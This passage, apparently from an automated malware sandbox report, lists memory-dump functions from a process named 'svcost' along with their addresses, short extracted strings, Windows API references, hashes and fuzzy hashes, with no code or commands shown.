                                                                                                • Instruction Fuzzy Hash: 11711874E142089FDB05DFA9D885A9EBBB6FF89310F208029E405A73A8DB745E46CF51
                                                                                                Function 00C42C08 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TJ"p$`Xh
                                                                                                • API String ID: 0-2970583535
                                                                                                • Opcode ID: b1fe4e5ac5e9f43155409aa1ee8655958eb2fbc21c4b5dd5d18fb53af6fda9fa
                                                                                                • Instruction ID: 5dc253629f4390f4dce81225112f5a54d8821174a217596ce61c97d36a496854
                                                                                                • Opcode Fuzzy Hash: b1fe4e5ac5e9f43155409aa1ee8655958eb2fbc21c4b5dd5d18fb53af6fda9fa
                                                                                                • Instruction Fuzzy Hash: BB711A74E14208DFDB05DFA9D485A9EBBF6FF89310F208029E405A7368DB745A46CF51
                                                                                                Function 00310870 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: hB+$Q,
                                                                                                • API String ID: 0-2296822707
                                                                                                • Opcode ID: 11259801ede67b9c58c8fd5409b1d82e808fe1c3070b83209c549e829ce2625b
                                                                                                • Instruction ID: fb1932b11a8ab08f0ecbb85c7fce2805cfcc6981943a76350ec31e19d844c2af
                                                                                                • Opcode Fuzzy Hash: 11259801ede67b9c58c8fd5409b1d82e808fe1c3070b83209c549e829ce2625b
                                                                                                • Instruction Fuzzy Hash: 1031E670E043498FCB08DFB8C854AEEBFB1EF89300F1586A9D505EB291D770A985CB90
                                                                                                Function 05400445 Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5$`Xh
                                                                                                • API String ID: 0-4184804756
                                                                                                • Opcode ID: 5311805a5e82f59b3480cab08b2c59c6f1b4f4511434c6967076ec8f403613cc
                                                                                                • Instruction ID: 91c77f465b73f6352177eb33a1fc14b9a829c17e85ca042055eb982f78bd9145
                                                                                                • Opcode Fuzzy Hash: 5311805a5e82f59b3480cab08b2c59c6f1b4f4511434c6967076ec8f403613cc
                                                                                                • Instruction Fuzzy Hash: 50110578A152288FCB25DF19D884ACAB7F5FB89300F1481EAE84DA3758CA345F81CF51
                                                                                                Function 00C43369 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >$>
                                                                                                • API String ID: 0-3778932101
                                                                                                • Opcode ID: caad2fc53d7a1848dbb96a337bc6f702aff32cdab91896f675b726832fa6d80b
                                                                                                • Instruction ID: f47d740a583755fb54156a15ddc30530931c427e562913953151f30b5947e7f5
                                                                                                • Opcode Fuzzy Hash: caad2fc53d7a1848dbb96a337bc6f702aff32cdab91896f675b726832fa6d80b
                                                                                                • Instruction Fuzzy Hash: 50F01C34D05248EFCB51DFA8D5556ADBBB4EB89300F10C1EA9C5893391E6359E46CF81
                                                                                                Function 05400EA3 Relevance: 2.5, Strings: 2, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$`Xh
                                                                                                • API String ID: 0-3201267524
                                                                                                • Opcode ID: 87f90b4ef67aef51743c5ee9b2281aabf0768a5b50cfab4aea7d736fa9b8d7a9
                                                                                                • Instruction ID: 9f1b6bad9e218dbfc82ed29a1796facf0692dae348e92732eda6d9226d64e03b
                                                                                                • Opcode Fuzzy Hash: 87f90b4ef67aef51743c5ee9b2281aabf0768a5b50cfab4aea7d736fa9b8d7a9
                                                                                                • Instruction Fuzzy Hash: BAF030746591188FD756DF68C898B8AB7F6EB89304F1041EAA50DA7354CB349F92CF10
                                                                                                Function 04B7DD40 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04B7DDE4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477347233.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4b70000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 7e8bc774d9d6027879b688037179103cbd2a937fd6449e669b8f2253dd60f2c1
                                                                                                • Instruction ID: 3ae199b3ec5e00e17a6216e8ae85f5cb7edaf727efb93d36ec153fdfb6457e14
                                                                                                • Opcode Fuzzy Hash: 7e8bc774d9d6027879b688037179103cbd2a937fd6449e669b8f2253dd60f2c1
                                                                                                • Instruction Fuzzy Hash: D73185B4D012489FDF14CFA9D984AEEFBB5EF49310F24942AE824BB210D735A945CF64
                                                                                                Function 00C5F708 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474344220.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c50000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 062089b4f7bf1a2c8a1ac77717945cc56e616d57ba693489465853df6ae3ad54
                                                                                                • Instruction ID: cc050a67127621ef18974036ff1e5c36f742da11480525e7acd40e92ffde8bb4
                                                                                                • Opcode Fuzzy Hash: 062089b4f7bf1a2c8a1ac77717945cc56e616d57ba693489465853df6ae3ad54
                                                                                                • Instruction Fuzzy Hash: D831DBB8D012189FDF10CFA9D984AEEFBF1AF49350F24842AE814B7210C735A945CF64
                                                                                                Function 00C5F710 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474344220.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c50000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 0343bcfb78f2e6a92abd9692858c1d07de751e6cd545a535d159ccc8221f89f5
                                                                                                • Instruction ID: 1e5bf459ef068a17b67e78c29a85ef1410e4e935498df46cafa8e827eb7a96d1
                                                                                                • Opcode Fuzzy Hash: 0343bcfb78f2e6a92abd9692858c1d07de751e6cd545a535d159ccc8221f89f5
                                                                                                • Instruction Fuzzy Hash: F931DBB8D012189FCB00CFA9D884AEEFBF4AB49310F24842AE814B7200C734A945CF64
                                                                                                Function 0432F968 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 0fd2e05279ab83c2db55dd0faaceefef39c333ff6e573ebb318e980b3f8b663f
                                                                                                • Instruction ID: e518b485531a9e941c0aaa112ec59fba7d9e8a78883430a4e275a3071f658e63
                                                                                                • Opcode Fuzzy Hash: 0fd2e05279ab83c2db55dd0faaceefef39c333ff6e573ebb318e980b3f8b663f
                                                                                                • Instruction Fuzzy Hash: D8C13570B006248FDB04DF69C994AAEBBF6EF89710F1180A9E505DB3A5DB70ED41CB91
                                                                                                Function 00C27D70 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 1c4858d8549cc1425ddf7bb464190d850ad265bfe69ba456254aaedc3d4ce149
                                                                                                • Instruction ID: 8a9f3021a2f1a52cbd914180a972cdc33e966f4bec5d2769103bfdbfa9238156
                                                                                                • Opcode Fuzzy Hash: 1c4858d8549cc1425ddf7bb464190d850ad265bfe69ba456254aaedc3d4ce149
                                                                                                • Instruction Fuzzy Hash: B4E11474A15218CFDB14DF69E884BADBBB6FF89310F1081A9E409A7764DB305E85CF11
                                                                                                Function 00C283B7 Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 6bf3bba432cdb7bd907df701b076dd1e985ceb621bd765c5d46227aa801968c7
                                                                                                • Instruction ID: a577e385643ce8ac7f53fb25491806a1cc86e96432f6b0effd08f9feff3f8bd9
                                                                                                • Opcode Fuzzy Hash: 6bf3bba432cdb7bd907df701b076dd1e985ceb621bd765c5d46227aa801968c7
                                                                                                • Instruction Fuzzy Hash: F3E15778A15218CFDB11DF69E890BADBBB1FF89310F1081A9D409A7765DB305E89CF11
                                                                                                Function 00C27D61 Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: ff98b57c908553783e3a557e593dbba39718d05ad3ced125e5b7d5fc918984b9
                                                                                                • Instruction ID: 119a447fa7ce4a869bbb2248ebbab4cd405061dbbe9a52eff33f3f94596b0b49
                                                                                                • Opcode Fuzzy Hash: ff98b57c908553783e3a557e593dbba39718d05ad3ced125e5b7d5fc918984b9
                                                                                                • Instruction Fuzzy Hash: F2E13674A15218CFDB15EF69E884BADBBB2FF89310F1081A9E409A7764DB305E85CF11
                                                                                                Function 00C27E98 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 81b7f098b640d3ecafb1601b841c7c598d0e9e57fcea3b505b29a2f6c83ae929
                                                                                                • Instruction ID: 68d0c4b5cd288950d1da7697a10987c61fdcfa5b1d52bd05bf68f5911e843031
                                                                                                • Opcode Fuzzy Hash: 81b7f098b640d3ecafb1601b841c7c598d0e9e57fcea3b505b29a2f6c83ae929
                                                                                                • Instruction Fuzzy Hash: 66D12678A15218CFDB14EF69E884BADBBB6FF89310F1081A9E409A7754DB305E85CF11
                                                                                                Function 008E4284 Relevance: 1.5, APIs: 1, Instructions: 37libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(70D67560,00000001,00000000,00000000), ref: 008E42BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474144763.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_8e0000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: a7cfcafe36969edd71abdebac63bcbec2653ca4f888a6e6a06dcf5117a02e09f
                                                                                                • Instruction ID: a76c8866e65ba84caf809c4c4183dc210ee469c54125dbd1ec400f2d2e8716da
                                                                                                • Opcode Fuzzy Hash: a7cfcafe36969edd71abdebac63bcbec2653ca4f888a6e6a06dcf5117a02e09f
                                                                                                • Instruction Fuzzy Hash: C9F0672054A3D49FE32297769C79B9A3F74AB03740F1444DAA5449B2E2C1B4584AC772
                                                                                                Function 008E4288 Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(70D67560,00000001,00000000,00000000), ref: 008E42BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474144763.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_8e0000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: cc592a4a0bdd8279900b05540919b4f22a742e488b7090873a5fa6296770244c
                                                                                                • Instruction ID: 7d6fe10632d3393c56f338dfe6aeb8ea2709223fee22b2ceff7f2a3aceccf9d5
                                                                                                • Opcode Fuzzy Hash: cc592a4a0bdd8279900b05540919b4f22a742e488b7090873a5fa6296770244c
                                                                                                • Instruction Fuzzy Hash: 0FF0BE2010A3D89FE31297768C79B4A3F78EF03740F1404D6A5448B2E3C1745849C372
                                                                                                Function 00C27F59 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 3d818e0e28759added73328ed0cc2a556cd837c38c40041451b137bf6d61ea54
                                                                                                • Instruction ID: 0bdc100cb3c18c291f45e4e3544912f2fe70b8bded67ffcbd5d5168d3c0763aa
                                                                                                • Opcode Fuzzy Hash: 3d818e0e28759added73328ed0cc2a556cd837c38c40041451b137bf6d61ea54
                                                                                                • Instruction Fuzzy Hash: 3DD15778A15218CFDB15EF69E884BADBBB2FF89310F1081A9E409A7754DB305E85CF11
                                                                                                Function 00C288DD Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 8d7796255251229f85665b6d29ccfe68431cc6a1fc9ae24712a2268512e826b8
                                                                                                • Instruction ID: 19c7a11f15729aaa7ffe3ccf9d53f0cb7b42555398b136e02dd697badb21e0f9
                                                                                                • Opcode Fuzzy Hash: 8d7796255251229f85665b6d29ccfe68431cc6a1fc9ae24712a2268512e826b8
                                                                                                • Instruction Fuzzy Hash: 79B12774E06228CFDB54DF69E980B9DBBB6FB89310F2091A9D009A7795DB305D86CF01
                                                                                                Function 00318780 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: e3566bd6c0124ffeaa7e6fb27ff475c51e7aad3f2e4a69fc0c0a966f0c0bb439
                                                                                                • Instruction ID: 9ae0e1b285212018c8a3d43e9a11a8658c37fb6926d8f0b81d4936794b60e343
                                                                                                • Opcode Fuzzy Hash: e3566bd6c0124ffeaa7e6fb27ff475c51e7aad3f2e4a69fc0c0a966f0c0bb439
                                                                                                • Instruction Fuzzy Hash: 47316C70D09208DFDB06DFA8C488BEDBBF9EB4A304F5180AAD005E7651DB754A85CB16
                                                                                                Function 0432AA30 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p
                                                                                                • API String ID: 0-2763268518
                                                                                                • Opcode ID: 843f29b1343a6e6c301a273e0cb9c57e45ba9b19e05cafb6012c66151ba2f4b1
                                                                                                • Instruction ID: 82e11fc7d2ce4fa9fb70f80c182a39494df0bd42f65fa13e8b35e06e8afde71f
                                                                                                • Opcode Fuzzy Hash: 843f29b1343a6e6c301a273e0cb9c57e45ba9b19e05cafb6012c66151ba2f4b1
                                                                                                • Instruction Fuzzy Hash: 07511731A046268FCB01DF68C894A6AFBB1FF85320B15C6A9E5159B352D730FC56CBD0
                                                                                                Function 0432B910 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p
                                                                                                • API String ID: 0-1059414960
                                                                                                • Opcode ID: 96d4c7b2381069a92c2acae12dc50e25637ea571a9e639cc1135d6323c96886c
                                                                                                • Instruction ID: 1f176ab84a729056bb4c61fa1d8b823068ec594ce226280d33c929ef3998958c
                                                                                                • Opcode Fuzzy Hash: 96d4c7b2381069a92c2acae12dc50e25637ea571a9e639cc1135d6323c96886c
                                                                                                • Instruction Fuzzy Hash: E8519D357002109FDB14DF69D895AAEBBA2EF89311B1581BAE905CB362DB31EC01CB91
                                                                                                Function 04329A70 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: p!p
                                                                                                • API String ID: 0-1147775804
                                                                                                • Opcode ID: 667d904c5b9fe4f5013397894740868b6194212fd51a56c0ddf6811cc1b9f222
                                                                                                • Instruction ID: bf01566aa91093b19afe611f8ddae0ff2c17933b49a3a4ed6ac1815c6ecf5218
                                                                                                • Opcode Fuzzy Hash: 667d904c5b9fe4f5013397894740868b6194212fd51a56c0ddf6811cc1b9f222
                                                                                                • Instruction Fuzzy Hash: 55513E76610110AFDB459FA8D945E697BB7FF8D31471680A8F2099B372CB32DC22EB50
                                                                                                Function 00C29B08 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 3d922900e4564a155fd0f4b3582b25cd7643417cc2fb46e42cfc40fb9a5ade28
                                                                                                • Instruction ID: 451286f273589334ff080d6fd67f798b5efb0ea7c071b3c75281aa1eac0d27dd
                                                                                                • Opcode Fuzzy Hash: 3d922900e4564a155fd0f4b3582b25cd7643417cc2fb46e42cfc40fb9a5ade28
                                                                                                • Instruction Fuzzy Hash: A6515B78A11228CFDB50DFA4E884BDDBBB1FB89310F1081A9E409A7755D7349D85CF54
                                                                                                Function 00C2E628 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 623191ff90648c1e1d84409b7ee673d4f04429a178f539e75cbce73d1bfdb7e3
                                                                                                • Instruction ID: 324569938704e551af824e479a6a794fcbd43456766feefabc48e8e18a14db11
                                                                                                • Opcode Fuzzy Hash: 623191ff90648c1e1d84409b7ee673d4f04429a178f539e75cbce73d1bfdb7e3
                                                                                                • Instruction Fuzzy Hash: 6C414370E14618DFDB05DFA9E850ADDBBB1FF99310F10822AE415B7650DB70A985CF40
                                                                                                Function 00C4D240 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oOI
                                                                                                • API String ID: 0-15478488
                                                                                                • Opcode ID: ff8fac437116f955126f1cff776de50b87515b96e63d8b7aa2e1932279f72a5e
                                                                                                • Instruction ID: 417a6febb6f59cf98aa5bdb41a92320e223d1ce6efece289518e73c0b1a9eedc
                                                                                                • Opcode Fuzzy Hash: ff8fac437116f955126f1cff776de50b87515b96e63d8b7aa2e1932279f72a5e
                                                                                                • Instruction Fuzzy Hash: F151C670E01208DFDB18DFBAD594A9DBBB2BF89301F20912AE416AB361DB359941CF50
                                                                                                Function 00C2E638 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: c5145842132431744fe88bb4d265126274561b70f06166ae954a3a94948c5421
                                                                                                • Instruction ID: 1538875f8002805d1b6cf761d2167ee42e03572b735a74c93d6c71f8eb20a1f5
                                                                                                • Opcode Fuzzy Hash: c5145842132431744fe88bb4d265126274561b70f06166ae954a3a94948c5421
                                                                                                • Instruction Fuzzy Hash: 99413570E14628DBDB04DFAAE850ADDBBB5FF99310F10822AE419B7650DB70A985CF40
                                                                                                Function 00C4D230 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oOI
                                                                                                • API String ID: 0-15478488
                                                                                                • Opcode ID: a4350963e7060663afac7f95a43df329746e08709aee92eb503f94a03a109887
                                                                                                • Instruction ID: 6fe4a2a224580f908af179169dcd30a92dc84a7dacdf95a6a9fd8a5991f1b424
                                                                                                • Opcode Fuzzy Hash: a4350963e7060663afac7f95a43df329746e08709aee92eb503f94a03a109887
                                                                                                • Instruction Fuzzy Hash: 6441D870E01208DFDB18DFB9D594A9DBBB2BF89300F20816EE415AB361DB359941CF50
                                                                                                Function 04B7EF08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04B7EFA7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477347233.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4b70000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: b6152cda85895b80f765cccc4d82afd3aa79545874b512aff343527519fc999d
                                                                                                • Instruction ID: af1f6e3af038e2aa16148eb7008ca564e41179baea9a7b2189366788650924cf
                                                                                                • Opcode Fuzzy Hash: b6152cda85895b80f765cccc4d82afd3aa79545874b512aff343527519fc999d
                                                                                                • Instruction Fuzzy Hash: 543198B4D012589FDF14CFA9E884AEEFBB1EF49310F24942AE824BB210D735A945CF54
                                                                                                Function 04327230 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `Xh
                                                                                                • API String ID: 0-2258447364
                                                                                                • Opcode ID: 57be7ec978f43496159de860d74f89bd0ffe44ef9f2515263ec9a9f38fa86c2d
                                                                                                • Instruction ID: 9445d0621c3cb7a90e2a73df6ca1b866a86f52a30e95f32f503f22739de7b652
                                                                                                • Opcode Fuzzy Hash: 57be7ec978f43496159de860d74f89bd0ffe44ef9f2515263ec9a9f38fa86c2d
                                                                                                • Instruction Fuzzy Hash: FE312574E14209CFDB04DFAAD5806EEBBBAFB89310F10906AE414A7365E7349A51CF51
                                                                                                Function 04327240 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
